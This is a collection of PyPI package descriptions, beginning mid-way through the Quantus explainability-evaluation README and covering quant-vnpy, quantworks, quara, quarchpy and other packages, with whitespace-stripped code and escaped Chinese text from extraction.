To follow this example, one needs to have quantus and torch installed, by e.g.,pip install 'quantus[torch]'.importquantusfromquantus.helpers.model.modelsimportLeNetimporttorchimporttorchvisionfromtorchvisionimporttransforms# Enable GPU.device=torch.device(\"cuda:0\"iftorch.cuda.is_available()else\"cpu\")# Load a pre-trained LeNet classification model (architecture at quantus/helpers/models).model=LeNet()ifdevice.type==\"cpu\":model.load_state_dict(torch.load(\"tests/assets/mnist\",map_location=torch.device('cpu')))else:model.load_state_dict(torch.load(\"tests/assets/mnist\"))# Load datasets and make loaders.test_set=torchvision.datasets.MNIST(root='./sample_data',download=True,transform=transforms.Compose([transforms.ToTensor()]))test_loader=torch.utils.data.DataLoader(test_set,batch_size=24)# Load a batch of inputs and outputs to use for XAI evaluation.x_batch,y_batch=iter(test_loader).next()x_batch,y_batch=x_batch.cpu().numpy(),y_batch.cpu().numpy()Step 2. Load explanationsWe still need some explanations to evaluate.\nFor this, there are two possibilities in Quantus. You can provide either:a set of re-computed attributions (np.ndarray)any arbitrary explanation function (callable), e.g., the built-in methodquantus.explainor your own customised functionWe show the different options below.Using pre-computed explanationsQuantus allows you to evaluate explanations that you have pre-computed,\nassuming that they match the data you provide inx_batch. Let's say you have explanations\nforSaliencyandIntegrated Gradientsalready pre-computed.In that case, you can simply load these into corresponding variablesa_batch_saliencyanda_batch_intgrad:a_batch_saliency=load(\"path/to/precomputed/saliency/explanations\")a_batch_intgrad=load(\"path/to/precomputed/intgrad/explanations\")Another option is to simply obtain the attributions using one of many XAI frameworks out there,\nsuch asCaptum,Zennit,tf.explain,\noriNNvestigate. The following code example shows how to obtain explanations (SaliencyandIntegrated Gradients, to be specific)\nusingCaptum:importcaptumfromcaptum.attrimportSaliency,IntegratedGradients# Generate Integrated Gradients attributions of the first batch of the test set.a_batch_saliency=Saliency(model).attribute(inputs=x_batch,target=y_batch,abs=True).sum(axis=1).cpu().numpy()a_batch_intgrad=IntegratedGradients(model).attribute(inputs=x_batch,target=y_batch,baselines=torch.zeros_like(x_batch)).sum(axis=1).cpu().numpy()# Save x_batch and y_batch as numpy arrays that will be used to call metric instances.x_batch,y_batch=x_batch.cpu().numpy(),y_batch.cpu().numpy()# Quick assert.assert[isinstance(obj,np.ndarray)forobjin[x_batch,y_batch,a_batch_saliency,a_batch_intgrad]]Passing an explanation functionIf you don't have a pre-computed set of explanations but rather want to pass an arbitrary explanation function\nthat you wish to evaluate with Quantus, this option exists.For this, you can for example rely on the built-inquantus.explainfunction to get started, which includes some popular explanation methods\n(please runquantus.available_methods()to see which ones). Examples of how to usequantus.explainor your own customised explanation function are included in the next section.As seen in the above image, the qualitative aspects of explanations\nmay look fairly uninterpretable --- since we lack ground truth of what the explanations\nshould be looking like, it is hard to draw conclusions about the explainable evidence. 
To gather quantitative evidence for the quality of the different explanation methods, we can apply Quantus.Step 3. Evaluate with QuantusQuantus implements XAI evaluation metrics from different categories,\ne.g., Faithfulness, Localisation and Robustness etc which all inherit from the basequantus.Metricclass.\nTo apply a metric to your setting (e.g.,Max-Sensitivity)\nit first needs to be instantiated:metric=quantus.MaxSensitivity(nr_samples=10,lower_bound=0.2,norm_numerator=quantus.fro_norm,norm_denominator=quantus.fro_norm,perturb_func=quantus.uniform_noise,similarity_func=quantus.difference,abs=True,normalise=True)and then applied to your model, data, and (pre-computed) explanations:scores=metric(model=model,x_batch=x_batch,y_batch=y_batch,a_batch=a_batch_saliency,device=device,explain_func=quantus.explain,explain_func_kwargs={\"method\":\"Saliency\"},)Use quantus.explainSince a re-computation of the explanations is necessary for robustness evaluation, in this example, we also pass an explanation function (explain_func) to the metric call. Here, we rely on the built-inquantus.explainfunction to recompute the explanations. The hyperparameters are set with theexplain_func_kwargsdictionary. Please find more details on how to usequantus.explainatAPI documentation.Employ customised functionsYou can alternatively use your own customised explanation function\n(assuming it returns annp.ndarrayin a shape that matches the inputx_batch). This is done as follows:defyour_own_callable(model,models,targets,**kwargs)->np.ndarray\"\"\"Logic goes here to compute the attributions and return anexplanation in the same shape as x_batch (np.array),(flatten channels if necessary).\"\"\"returnexplanation(model,x_batch,y_batch)scores=metric(model=model,x_batch=x_batch,y_batch=y_batch,device=device,explain_func=your_own_callable)Run large-scale evaluationQuantus also provides high-level functionality to support large-scale evaluations,\ne.g., multiple XAI methods, multifaceted evaluation through several metrics, or a combination thereof. To utilisequantus.evaluate(), you simply need to define two things:TheMetricsyou would like to use for evaluation (each__init__parameter configuration counts as its own metric):metrics={\"max-sensitivity-10\":quantus.MaxSensitivity(nr_samples=10),\"max-sensitivity-20\":quantus.MaxSensitivity(nr_samples=20),\"region-perturbation\":quantus.RegionPerturbation(),}TheXAI methodsyou would like to evaluate, e.g., adictwith pre-computed attributions:xai_methods={\"Saliency\":a_batch_saliency,\"IntegratedGradients\":a_batch_intgrad}You can then simply run a large-scale evaluation as follows (this aggregates the result bynp.meanaveraging):importnumpyasnpresults=quantus.evaluate(metrics=metrics,xai_methods=xai_methods,agg_func=np.mean,model=model,x_batch=x_batch,y_batch=y_batch,**{\"softmax\":False,})Please seeGetting started tutorialto run code similar to this example. 
For more information on how to customise metrics and extend Quantus' functionality, please seeGetting started guide.TutorialsFurther tutorials are available that showcase the many types of analysis that can be done using Quantus.\nFor this purpose, please see notebooks in thetutorialsfolder which includes examples such as:All Metrics ImageNet Example: shows how to instantiate the different metrics for ImageNet datasetMetric Parameterisation Analysis: explores how sensitive a metric could be to its hyperparametersRobustness Analysis Model Training: measures robustness of explanations as model accuracy increasesFull Quantification with Quantus: example of benchmarking explanation methodsTabular Data Example: example of how to use Quantus with tabular dataQuantus and TensorFlow Data Example: showcases how to use Quantus with TensorFlow... and more.ContributingWe welcome any sort of contribution to Quantus! For a detailed contribution guide, please refer toContributingdocumentation first.If you have any developer-related questions, pleaseopen an issueor write us athedstroem.anna@gmail.com."} +{"package": "quant-util", "pacakge-description": "No description available on PyPI."} +{"package": "quantutils", "pacakge-description": "quantutilsQuickStartInstallationpipinstallquantutilsUsageimportquantutilsasqsqs.gen_daily_profit_df(df,\"Name\")"} +{"package": "quant-vnpy", "pacakge-description": "quant vnpy\u4e00\u3001 \u7b80\u4ecb1. \u529f\u80fd\u7b80\u4ecb\u672c\u5de5\u5177\u5305\u662f\u57fa\u4e8evnpy\u7684\u56de\u6d4b\u5e93\u7684\u4e00\u4e9b\u589e\u5f3a\u51fd\u6570quant_vnpy \u76ee\u5f55\u5305\u542b\u5404\u79cd\u589e\u5f3a\u51fd\u6570\u53ca\u7c7b\u5e93strategies \u4e3a\u7b56\u7565\u5e932. \u7248\u672c\u5386\u53f22021-01-22 v0.6.0feat: add track performance feature.2021-01-19 v0.5.12fix: TargetPosAndPriceTemplate current_pos -> target_pos by one step\nfix: strategy_class_name wrong2021-01-15 v0.5.5fix: add exception handle and logger on TradeDataCollector\nfix: TargetPosAndPriceTemplate current_pos -> target_pos by one step2021-01-14 v0.5.1feat: record backtest statsfeat: add default rate for backtestfix: DCE\u591c\u76d8\u4ea4\u6613\u65e5\u671f\u4e3a\u4e0b\u4e00\u4ea4\u6613\u65e5\uff0c\u5c06\u4f1a\u88ab\u91cd\u5199\u4e3a\u5f53\u524d\u7cfb\u7edf\u65e5\u671f\nfix: \u4fee\u590d\u8de8\u65e5\u62a5\u8868\u7edf\u8ba1\u9519\u8beffix: cross_limit_method param missing for file_name_func functionfix: \u4e3b\u529b\u5408\u7ea6\u3001\u6b21\u4e3b\u529b\u5408\u7ea6\u6570\u636e\u590d\u6743\u6574\u7406 bug2021-01-08 v0.5.0refactor: merge portfolio run_backtest and cta run_backtest2021-01-07 v0.4.13feat: set_strategy_status(StrategyStatusEnum.Stopped)feat: monitor add setting2021-01-05 v0.4.11refactor: longer interval of plotly.io._orca.cleanupfeat: backtest: output param file if it's available2021-01-04 v0.4.10fix: MACDSignal2021-01-04 v0.4.9fix: check not strategy_status_monitor.is_alive()2020-12-27 v0.4.8feat: backtest: reset_index on result_dffix: portfolio template, last_order_dt -> dictfeat: add new TargetPosAndPriceTemplate, MACrossSignal2020-12-27 v0.4.7feat: backtest: default ratefeat: backtest: available filter for return_drawdown_ratio < 2 and np.round for some stats items2020-12-25 v0.4.6feat: backtest: auto search symbol sizefix: report gl calc wrong in some cases2020-12-23 v0.4.4fix: report holding pos status calc wrongfix: stop_opening_pos on templates2020-12-22 v0.4.2fix: order_data_collector error on portfolio_strategy.template2020-12-21 v0.4.1fix: open_price -> last_price2020-12-18 v0.4.0feat: 
support user_name, broker_idfeat: add last_order_dt on template2020-12-18 v0.3.9fix: orm close connectionfeat: position daily stat.2020-12-16 v0.3.7feat: add CrossLimitMethod.fix_price for backtestfeat: add quant_vnpy.backtest.cta_strategy.template.CtaTemplatefeat: backtest cross price method2020-12-14 v0.3.2add position monitor2020-12-11 v0.2.16feat: on_tick active on_bar by bg on template.pyfeat: add OrderDataCollector, TradeDataCollector classfeat: add stop_if_pos_2_0 on cta templatefix: bug fix of on_tick and report error2020-12-04 v0.2.8feat: more readable log2020-11-30 v0.2.7feat: orm add symbols2020-11-27 v0.2.3fix: bug fix on log format2020-11-25 v0.2.2fix: bug fix on on_stop of portfolio template2020-11-25 v0.2.1feat: add strategy status monitor2020-11-24 v0.1.10feat: add bar_count2020-11-20 v0.1.8bug fix on portfolio's template2020-11-17 v0.1.7feat: \u5bf9 cta \u53ca portfolio \u589e\u52a0 template \u6a21\u677f\u7c7bfeat: signal \u589e\u52a0 0 \u5224\u65ad \u5f53 0 \u65f6\uff0c\u9ed8\u8ba4\u4e3a default \u503cfeat: add current_bar for cta, portfolio's template classesfix: template bugs2020-11-15 v0.1.2feat: \u6700\u65b0\u4f9d\u8d56\u7248\u672c IBATS_Common>=0.20.8\uff0c\u6700\u65b0\u652f\u6301\u9053 vnpy 2.1.7 \u7248\u672cfeat: \u8c03\u6574 INSTRUMENT_TRADE_TIME_PAIR_DIC \u9053 constants.py2020-11-10 v0.1.0feat: \u57fa\u4e8evnpy 2.1.6\u8fdb\u884c\u7684\u529f\u80fd\u589e\u5f3a\u3002\u6b64\u524d\u7248\u672c\u4e0d\u652f\u6301\u3002\u4e8c\u3001 \u73af\u5883\u8bbe\u7f6e\u53ca\u7ec4\u4ef6\u5b89\u88c5\uff08\u9996\u6b21\u8fd0\u884c\u524d\u9700\u8981\uff091. \u7cfb\u7edf\u73af\u5883\u5305\u542bAnaconda\u6216 Miniconda\uff08python 3.7 \u7248\u672c\uff092. \u5b89\u88c5vnpy 2.1.6\u6216\u4ee5\u4e0a\u7248\u672c\\3. \u8fd0\u884c\u5b89\u88c5\u76f8\u5173\u7ec4\u4ef6pip isntall -r requirement.txt\nconda install -c plotly plotly-orca\nconda install -c plotly python-kaleido\u5982\u679c\u6267\u884c\u9047\u5230\u95ee\u9898\u53ef\u5206\u522b\u6267\u884c\u5982\u4e0b\uff1a\u901a\u7528\u7ec4\u4ef6pip install -r requirement.txtorca \u7ec4\u4ef6\norca \u7ec4\u4ef6\u4e3a\u56de\u6d4b\u529f\u80fd\u4e2d\u4fdd\u5b58\u56de\u6d4b\u89c6\u56fe\u7ed3\u679c\u7684\u7ec4\u4ef6\uff0cwindows\u7cfb\u7edf\u6027\u9700\u8981\u5355\u72ec\u5b89\u88c5\uff0c\u624d\u53ef\u4fdd\u8bc1\u529f\u80fd\u6b63\u5e38\u4f7f\u7528\u5b89\u88c5\u6b65\u9aa4\u5982\u4e0b\uff1a\u5b89\u88c5\u7ec4\u4ef6\u5305conda install -c plotly plotly-orca\u4e0b\u8f7d\u5e76\u5b89\u88c5 orca \u5e94\u7528\u7ec4\u4ef6\u4e0b\u8f7d\u5730\u5740\uff1aorca\u7ec4\u4ef6\u5b89\u88c5\u540e\u8bbe\u7f6e\u8bdd\u5c31\u73af\u5883\u53d8\u4e86 Path \u52a0\u5165\u76f8\u5e94\u8def\u5f84\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0bwindow10\u64cd\u4f5c\u7cfb\u7edf orca \u7ec4\u4ef6\u5c06\u88ab\u5b89\u88c5\u5728\u5982\u4e0b\u8def\u5f84\uff1aC:\\Users\\mmmaaaggg\\AppData\\Local\\Programs\\orca\u6279\u91cf\u5173\u95ed orca \u8fdb\u7a0b\u65b9\u6cd5ps-ef|greporca|grep-vgrep|awk'{print $2}'|xargskill-9MD\u6587\u4ef6\u8f6cword\u6587\u6863\u5de5\u5177\u5230pandoc\u5b98\u7f51\u4e0b\u8f7d\u5bf9\u5e94\u7684\u8f6f\u4ef6\u5e76\u5b89\u88c5\u540e\u5373\u53ef\u8fd0\u884c Scripts\\md_2_docx.bat \u811a\u672c\u4e09\u3001 \u5e38\u7528\u547d\u4ee41. 
\u5207\u6362\u8fdc\u7a0b\u4ed3\u5e93\u5730\u5740\u65b9\u6cd5>git remote\norigin\n>git remote get-url --all origin\ngit@192.168.10.117:quant/quant_vnpy.git\n>git remote set-url origin http://209386rt46.51vip.biz:23987/quant/quant_vnpy.git\n>git pull\nremote: Enumerating objects: 8, done.\nremote: Counting objects: 25% (2/8)\nremote: Counting objects: 100% (8/8), done.\nremote: Total 72 (delta 8), reused 8 (delta 8), pack-reused 64\nUnpacking objects: \n6% (5/72)Unpacking objects: \n34% (25/72)Unpacking objects: \nUnpacking objects: 100% (72/72), 17.93 KiB | 23.00 KiB/s, done.\nFrom http://209386rt46.51vip.biz:23987/quant/From http://209386rt46.51vip.biz:23987/quant/quant_vnpy\n cb6c014..1afe166 master -> origin/master\nUpdating cb6c014..1afe166\nFast-forward\n README.md | 7 +\n ...\n 8 files changed, 404 insertions(+), 106 deletions(-)2. \u6570\u636e\u5e93 dump \u6570\u636e\u5907\u4efd\u4e3b\u529b\u5408\u7ea6\"c:\\Program Files\\MySQL\\MySQL Server 8.0\\bin\\mysqldump.exe\" -u mg -p --databases vnpy dbbardata --where=\"symbol in ('rb9999', 'hc9999', 'i9999') and `interval`='1m'\" > dbbardata_dump.sql\u5907\u4efd\u4e3b\u529b\uff0c\u6b21\u4e3b\u529b\u5408\u7ea6\"c:\\Program Files\\MySQL\\MySQL Server 8.0\\bin\\mysqldump.exe\" -u mg -p vnpy dbbardata --where=\"(symbol like'%9999' or symbol like'%8888') and `interval`='1m'\" > dbbardata_dump.sql3. \u538b\u7f29\u547d\u4ee4zip-r0q/media/mg/Data/output_20201220.zipoutput4. \u72ec\u7acb\u542f\u52a8\u4ea4\u6613\u754c\u9762d:\\ide\\vnstudio\\python.exe -m vnstation runtrader \"{'gateway': {'CTP': true}, 'app': {'CtaStrategy': true, 'PortfolioStrategy': true, 'PortfolioManager': true}, 'path': 'D:\\\\TradeTools\\\\vnpy\\\\jianxin_11859077'}\"\u56db\u3001 \u5404\u4e2a\u7248\u672c\u5e38\u89c1\u9519\u8bef2.0.3\u7248\u672c\u9519\u8bef\u63d0\u793a\u6846\u592a\u957f\uff0c\u65e0\u6cd5\u770b\u5230\u9519\u8bef\u4fe1\u606fpython.exe -m vnstation\u9519\u8bef\u63d0\u793a\uff1aValueError: numpy.ufunc size changed, may indicate binary incompatibility. Expected 216 from C header, got 192 from PyObject\n\u89e3\u51b3\u65b9\u6cd5\uff1aScripts\\pip.exe install numpy==1.16.1 --user\u7a7f\u900f\u5f0f\u6d4b\u8bd5\u901a\u4e0d\u8fc7\uff0c\u91c7\u96c6\u4e0d\u5230CPU\u3001\u786c\u76d8\u3001BIOS\u4fe1\u606f\n\u4fee\u6539\u73af\u5883\u53d8\u91cf\n\u589e\u52a0\u76ee\u5f55C:\\Windows\\SysWOW64\\wbem"} +{"package": "quant-wheel", "pacakge-description": "quant-wheelA template repository for building python packages. Please replace$packagewith the package's name.Installation$pipinstallquant-wheelSee AlsoGithub repositoryhttps://github.com/Chitaoji/quant-wheel/PyPI projecthttps://pypi.org/project/quant-wheel/LicenseThis project falls under the BSD 3-Clause License.Historyv0.0.0Initial release."} +{"package": "quantworks", "pacakge-description": "QuantWorksQuantWorks is anevent driven algorithmic tradingframework. It is a fork ofPyAlgoTrade(seeMotivation).QuantWorks provides a Python API forstrategyauthoring,backtesting,paper trading, and of courselive tradingvia theBrokerinterface.To get started using QuantWorks, please take a look at the originalPyAlgoTradetutorialand thefull documentation.Main FeaturesPython 3 developmentPython 2 support isNOTguaranteed in any capacity.Event driven.Supports Market, Limit, Stop and StopLimit orders.Supports any type of time-series data in Pandas or CSV format (like Yahoo! Finance, Google Finance, Quandl and NinjaTrader), as well as database (i.e. 
sqlite).Technical indicators and filters like SMA, WMA, EMA, RSI, Bollinger Bands, Hurst exponent and others.Performance metrics like Sharpe ratio and drawdown analysis.Event profiler.TA-Lib integration.MotivationQuantWorks is a fork ofPyAlgoTradeby@gbeced. This project aims to be:Modern: first-classPython 3development (Python 2 is EOL as of 2020)Extensible: as a framework, robust extension support is a must, and we encourage users of QuantWorks to give back by publishing their extensions (seeExtensions)Easy to Develop: state-of-the-art tooling (pytest, poetry, travis) and approachable design principles should make it easy for newcomers to contribute.Open: as a fork of an Apache 2.0 license project, QuantWorks maintains the spirit of FOSS development.CONTRIBUTING.md forthcomingDevelopmentQuantWorks is developed and tested using 3.7 and depends on:NumPy and SciPy.pytz.dateutil.requests.matplotlibfor plotting support.ws4pyfor Bitstamp support.tornadofor Bitstamp support.tweepyfor Twitter support.Developer ergonomics are provided bypoetrypytesttoxtravis-ciExtensionsBitstamp(bitcoin) live trading is implemented by thequantworks-bitstamppackage (https://pypi.org/project/quantworks-bitcoin/)Twitter real-time feeds are supported via thequantworks-twitterpackage (https://pypi.org/project/quantworks-twitter/)"} +{"package": "quantworks-bitcoin", "pacakge-description": "No description available on PyPI."} +{"package": "quantworks-twitter", "pacakge-description": "No description available on PyPI."} +{"package": "quant-wxk-py", "pacakge-description": "A small example package"} +{"package": "quantx", "pacakge-description": "UNKNOWN"} +{"package": "quanty", "pacakge-description": "No description available on PyPI."} +{"package": "quantzbrapi", "pacakge-description": "No description available on PyPI."} +{"package": "quantzero", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantzoo", "pacakge-description": "\ud83d\udd25QuantZoo\ud83d\udd25Installpipinstall-UquantzooDocsUsagesimport quantzoo\u4e2a\u4eba\u8d22\u5bcc\u91cf\u5316\u6295\u8d44\u7cfb\u7edf\u7c7b\u63a8\u8350\u7cfb\u7edfTODO=======\nHistory0.0.0 (2022-04-18)First release on PyPI."} +{"package": "quantzsl", "pacakge-description": "No description available on PyPI."} +{"package": "quanutm-isl", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quanyouzheng", "pacakge-description": "No description available on PyPI."} +{"package": "quanzhou", "pacakge-description": "No description available on PyPI."} +{"package": "quao", "pacakge-description": "quaoquao is a supporting library for Quantum Computing.InstallationInstall quao with pip (Python >=3.10)pipinstallquaoUsage/ExamplesfromquaoimportBackend,RequestData,Utils#Definesdknamesdk=\"qiskit\"#Pre-processinginputdatadefpre_process(input):data=RequestData(input,sdk)returndata#Post-processingoutputdatadefpost_process(job):output=Utils.counts_post_process(job)returnoutputdefhandle(event,context):#1.Pre-processingrequestData=pre_process(event)#2.GenerateQuantumCircuitqc=generate_circuit(requestData.input)#3.VerifyandgetBackendinformationbackend=Backend(requestData,qc)#4.Submitjobandwaitupto1minforjobtocomplete.job=backend.submit_job(qc)#5.Post-processifjob.jobResult:job=post_process(job)response=Utils.generate_response(job)#6.SendbacktheresultreturnresponseAuthorsCITYNOW Co. 
Ltd.DocumentationTBA"} +{"package": "quara", "pacakge-description": "Quara, which stands for \u201cQuantum Characterization\u201d, is an open-source library for characterizing elementary quantum operations. Currently protocols of standard tomography for quantum states, POVMs, and gates are implemented.Documentation:https://quara.readthedocs.io/en/stable/Tutorials:https://github.com/tknrsgym/quara/tree/master/tutorialsSource code:https://github.com/tknrsgym/quaraBug reports:https://github.com/tknrsgym/quara/issuesContributing:https://github.com/tknrsgym/quara/blob/master/docs/contributing.rstInstallPython version:3.7+pip install quaraUse with other optimization parsers and solversQuara can also be used with other optimization parsers and solvers. The currently supported combinations are as follows:parsersolverinstallCVXPYMOSEKSeethe CVXPY websiteInterface from different packagesQuara supports the wrappers for executing standard tomography from several packages. To use this wrapper, install the package to be used as follows:Qiskit:pip install qiskitQuTiP:pip install qutipForest:Install Forest SDK, pyQuil, QVM, and Quil Compiler. Seethe pyQuil websitefor installation instructions.See the tutorial for detailed instructions.Using Quara\u2019s standard tomography features from QiskitUsing Quara\u2019s standard tomography features from QuTiPUsing Quara\u2019s standard tomography features from Forest [1qubit/2qubit]CitationIf you use Quara in your research, please cite as per the includedCITATION.cff file.LicenseApache License 2.0LICENSESupportsQuara development is supported byJST, PRESTO Grant Number JPMJPR1915, Japan."} +{"package": "quara-creds", "pacakge-description": "QUARA CredsCLI usageDisplay helpSeveral subcommands are available. The--helpoption is available at different levels:# General helppync--help# cert command group helppynccert--help# cert sign subcommand helppynccertsign--helpInitialize environmentInitialize with default configurationpyncinitReset configurationpyncinit--forceConfigure authorities from a JSON file (either a path or an URL):pyncinit--authoritieshttps://example.com/authorities.jsonManage keypairsCreate a new keypair for current user:pynckeygenCreate a new keypair for a different user:pynckeygen-ntestList available keypairspynckeylistDisplay a public keypynckeyshow-ntestDisplay a private keypynckeyshow-ntest--privateManager certificate authoritiesList available authorities:pynccalistShow authorities details:pynccashowShow authorities certificates:pynccashow--pemNebula certs examplesCreate a new CA and a sign a new certificatefromquara.creds.nebulaimport(EncryptionKeyPair,SigningCAOptions,SigningOptions,sign_ca_certificate,sign_certificate,verify_certificate,)# Create a new CAca_keypair,ca_crt=sign_ca_certificate(options=SigningCAOptions(Name=\"test\"))# Create a new keypair for the certificateenc_keypair=EncryptionKeyPair()# Sign a new certificatenew_crt=sign_certificate(ca_key=ca_keypair,ca_crt=ca_crt,public_key=enc_keypair,options=SigningOptions(Name=\"test\",Ip=\"10.100.100.10/24\",),)# Write files to diskca_crt.write_pem_file(\"ca.crt\")ca_keypair.write_private_key(\"ca.key\")new_crt.write_pem_file(\"node.crt\")enc_keypair.write_private_key(\"node.key\")enc_keypair.write_public_key(\"node.pub\")# Verify that the certificate is validverify_certificate(ca_crt=ca_crt,crt=new_crt)This example generates 5 files:ca.crt: The CA certificate created during the first step.ca.key: The private key of the CA. 
The public key is also present within this file.node.crt: The certificate created during the second step.node.key: The private key associated with the certificate. Unlike CA private keys, the public key is not present within the file.node.pub: The public key associated with the certificate. The public key is also embedded within the certificate.Load an existing CA and sign a new certificatefromquara.creds.nebulaimport(Certificate,EncryptionKeyPair,SigningKeyPair,SigningOptions,sign_certificate,verify_certificate,)# Load CA certificateca_crt=Certificate.from_file(\"ca.crt\")# Load CA keypairca_keypair=SigningKeyPair.from_file(\"ca.key\")# Create a new keypair for the certificateenc_keypair=EncryptionKeyPair()# Sign a new certificatenew_crt=sign_certificate(ca_key=ca_keypair,ca_crt=ca_crt,public_key=enc_keypair,options=SigningOptions(Name=\"test\",Ip=\"10.100.100.10/24\",),)# Write files to disknew_crt.write_pem_file(\"node.crt\")enc_keypair.write_private_key(\"node.key\")enc_keypair.write_public_key(\"node.pub\")# Verify that the certificate is validverify_certificate(ca_crt=ca_crt,crt=new_crt)In this case, only 3 files are created, as the CA certificate and the CA key already existed before.Load an existing CA, an existing public key, and sign a new certificatefromquara.creds.nebulaimport(Certificate,PublicEncryptionKey,SigningKeyPair,SigningOptions,sign_certificate,verify_certificate,)# Load CA certificateca_crt=Certificate.from_file(\"ca.crt\")# Load CA keypairca_keypair=SigningKeyPair.from_file(\"ca.key\")# Load public key from filepub_key=PublicEncryptionKey.from_file(\"node.pub\")# Sign a new certificatenew_crt=sign_certificate(ca_key=ca_keypair,ca_crt=ca_crt,public_key=pub_key,options=SigningOptions(Name=\"test\",Ip=\"10.100.100.10/24\",),)# Write files to disknew_crt.write_pem_file(\"node.crt\")# Verify that the certificate is validverify_certificate(ca_crt=ca_crt,crt=new_crt)In this case, only the certificate file is written to disk, as all other information was known before issuing the certificate."} +{"package": "quarantine", "pacakge-description": "Your project\u2019s description"} +{"package": "quara-poetry-core-next", "pacakge-description": "Poetry CoreAPEP 517build backend implementation developed forPoetry. This project is intended to be a light weight, fully compliant,\nself-contained package allowing PEP 517 compatible build frontends to build Poetry managed projects.UsageIn most cases, the usage of this package is transparent to the end-user as it is either made use by Poetry itself\nor a PEP 517 frontend (eg:pip).In order to enable the usepoetry-coreas your build backend, the following snippet must be present in your\nproject'spyproject.tomlfile.[build-system]requires=[\"poetry-core\"]build-backend=\"poetry.core.masonry.api\"Once this is present, a PEP 517 frontend likepipcan build and install your project from source without the need\nfor Poetry or any of it's dependencies.# install to current environmentpipinstall/path/to/poetry/managed/project# build a wheel packagepipwheel/path/to/poetry/managed/projectWhy is this required?Prior to the release of version1.1.0, Poetry was a build as a project management tool that included a PEP 517\nbuild backend. This was inefficient and time consuming in majority cases a PEP 517 build was required. For example,\nbothpipandtox(with isolated builds) would install Poetry and all dependencies it required. 
Most of these\ndependencies are not required when the objective is to simply build either a source or binary distribution of your\nproject.In order to improve the above situation,poetry-corewas created. Shared functionality pertaining to PEP 517 build\nbackends, including reading lock file,pyproject.tomland building wheel/sdist, were implemented in this package. This\nmakes PEP 517 builds extremely fast for Poetry managed packages."} +{"package": "quarc", "pacakge-description": "Starts a server that allows python code to be run within the web applications found athttps://quarc.services."} +{"package": "quarc-gateway", "pacakge-description": "This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details."} +{"package": "quarchCalibration", "pacakge-description": "QuarchCalibrationQuarchCalibration is a python package that allows calibration of Quarch modules.Change Log1.1.10Minor bug fixesNoise test made standalone and now uses QISUpdated production filepath of calibration report files1.1.9Minor bug fixesAdded support for QTL2910-021.1.8Updates for AC CalibrationMinor bug fixes1.1.7Minor error logging fixMinor device selection for AC calibration fix1.1.6Uptades for AC CalibrationMinor bug fixes1.1.5-Bug fixes1.1.4Fixes for edsff calibrationFixes for modules with no noise test1.1.3Added QTL1944_06Added Noise Test.1.1.2Added QTL2887 Gen5 EDSFF Fixture (E1)Added QTL2888 GEN5 EDSFF Fixture (E3)1.1.1Added QTL2674 EDSFF Fixture (E3)1.1.0Added QTL2788 Gen 5 SFF PAM Fixture calibration1.0.0Added QTL2673 EDSFF Fixture (E1)fixes for import bug0.0.0Initial separation of calibration from QuarchPy"} +{"package": "quarchpy", "pacakge-description": "QuarchpyQuarchPy is a python package designed to provide an easy-to-use API which will work seamlessly over any connection option: USB, Serial and LAN. With it, you can create your own scripts for controlling Quarch devices - without having to worry about the low-level code involved with communication.The package contains all prerequisites needed as a single PyPI project, which can be installed from the python online repository using PIP. This makes it easy to install and update, while also providing you with full access to the source code if you want to make changes or additions.QuarchPy can also communicate to the device via QIS (Quarch Instrument Server), QPS (Quarch Power Studio), or simply using Python scripts. 
Both QIS and QPS are included with the QuarchPy Package - they are ready to use (Java and drivers may also be needed).Change Log2.1.20Improved direct IP scanning for quarch modules.New QPS v1.37 and QIS v1.402.1.19Imporoved QIS streamingBug fixesAdded zeroconf, numpy and pandas as requirements2.1.18Minor bug fix2.1.17Improved QIS QPS launching on Linux sytemsSystem debug for linux systems2.1.16FIO mb/s parsingImproved QIS QPS launching2.1.15minor bug fix2.1.14minor bug fixes and logging improvements.2.1.13New QPS v1.36New QIS v1.39minor bug fixes and logging improvements.2.1.12New QPS v1.35New QIS v1.38minor bug fixes and removal of depracated code.2.1.11New QPS v1.32New QIS v1.37quarchpy.run module_debug added for checking state of module and DUT2.1.10New QPS v1.29New QIS v1.332.1.8New QPS v1.282.1.7New QPS v1.27New QIS v1.322.1.6New QPS v1.26New QIS v1.312.1.5New QPS v1.242.1.4New QPS v1.23New QIS v1.292.1.3New QPS v1.22modules on the network can now be connected to using conType:QTLNumber eg. TCP:QTL1999-02-001.fixed QIS not closing with QPS when launch with by QPScloseConnection added to QIS apidisplay table formats multiline items and handles empty cells2.1.2QPS v1.20QIS v1.192.1.1Seperation of QIS module scan and QIS select deviceAdded getQuarchDevice which is a wrapper around quarchDevice that allows connections to sub-devices in array controllers over all connection typesVersion compare updated to use __version__ rather than pkg_resourcesSeperated the SystenTest (debug_info) into seperate parts with flags to allow the user to skip certain parts. This allows the test to be run without user interaction of selecting a module.2.1.0logging improvementsusb locked devices fix for CentOS, Ubuntu, and Fedora2.0.22Calibration and QCS removed from quarchpy and are not in their own packagesNew command \u201cpython -m quarchpy.run debug -usbfix\u201d sets USB rules to fix quarch modules appearing as locked devices on Linux OS2.0.21new QIS v1.232.0.20New modules added to calibration, wiring prompt added, logging improvementsFixes for PAM streaming using QISAdded Quarchpy.run list_drivesImproved communication for connection_QPSImproved QCS debuggingReworked QCS drive detection for upcoming custom drive detection\u201cquarchpy.run list_drives\u201d command added2.0.19QPS v1.17Quarchpy run terminal runs the simple python terminal to talk to modulesScan Specific IP address for Quarch module via QIS/QPS addedUpdated performance class for new QCS testsFixed Centos QCS drive selection bugImproved QCS connection classesImproved features for QCSMinor bug fixes2.0.18QPS 1.13Iomenter drive location bugfixUnits added to stats export from QPSChanged QCS tests to work off of a python formatUpdated drive detection in QCSUpdated communication to TLS2.0.16QPS 1.112.0.15QIS v1.19.03 and QPS 1.10.12Updated debug info testSnapshots and stats from QPS functions addedCalibration updates2.0.14QPS annotations through quarchpy improvements2.0.13Python2 bug fixesUI tidy upNew custom annotations and comments QPS API2.0.12Fixed issue with array module scan over UDP outside of subnetBug fix for HD connection via USB in linuxAdded headless launch of QISAdded Shinx auto documentationFixed issue with USB command response timeout in longer QCS testsFixed issue where UDP locate parser was using the legacy header, not the quarch fieldsImproved qurchpy.run oarsing and help generationFixed syntax warnings for string literal comparisonsCalibration wait for specific module uptime and report file updates2.0.11Improved list selection 
